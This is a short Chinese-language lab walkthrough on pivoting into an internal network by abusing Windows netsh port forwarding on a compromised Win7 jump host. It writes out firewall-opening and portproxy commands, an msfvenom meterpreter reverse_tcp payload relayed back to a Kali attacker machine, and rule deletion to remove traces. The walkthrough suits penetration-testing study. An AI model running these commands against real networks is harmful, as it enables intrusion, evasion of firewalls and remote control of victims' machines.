声明:本文仅限于技术交流,请遵守网络安全法,否则后果自负。
0.实际操作视频,请移步
https://www.bilibili.com/video/BV1Uv4y1R7vq/
1.netsh简介
netsh 是Windows系统自身提供的网络配置命令行工具,所以具有免杀的效果
使用前提:administrator权限
2.环境和拓扑图:
2.1环境
kali 网卡1 桥接 192.168.1.6
跳板机win7 网卡1 桥接 192.168.1.8 网卡2 仅主机10.10.10.7
目标及 win2012 网卡1 仅主机 10.10.10.13
跳板机win7开启防火墙(域、工作组和外网等都开启防火墙),仅仅80端口对外网开放
netsh advfirewall firewall add rule name="Site" dir=in action=allow protocol=TCP localport=80
查看防火墙
netsh firewall show state
查看netsh规则
netsh interface portproxy show all
2.2.拓扑图

3.渗透内网步骤
3.1.获取跳板机webshell,上传exe木马,反弹到kali
3.2跳板机上添加防火墙规则,允许外网访问跳板机tcp协议1616端口
netsh advfirewall firewall add rule name="shiliu" dir=in action=allow protocol=TCP localport=1616
3.3添加跳板机的netsh规则把跳板机外网ip192.168.1.8的1616端口映射到内网10.10.10.13的8080端口
netsh interface portproxy add v4tov4 listenport=1616 connectaddress=10.10.10.13 connectport=8080
3.4访问目标机器
http://192.168.1.8:1616/bluecms/uploads/
3.5获取目标机器的webshell
3.6跳板机上添加规则转发跳板机的16161端口的流量到外网kali192.168.1.6的16161端口上
netsh interface portproxy add v4tov4 listenport=16161 connectaddress=192.168.1.6 connectport=16161
3.7制作木马反弹流量到跳板机内网ip10.10.10.7的16161端口上,然后再通过跳板机转发到kali
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.7 lport=16161 -f exe -o 16.exe
3.8跳板机的防火墙添加允许TCP16161端口进栈
netsh advfirewall firewall add rule name="16" dir=in action=allow protocol=TCP localport=16161
3.9删除规则
netsh advfirewall firewall delete rule name="shiliu"
netsh advfirewall firewall delete rule name="16"
netsh interface portproxy delete v4tov4 listenport=1616
netsh interface portproxy delete v4tov4 listenport=16161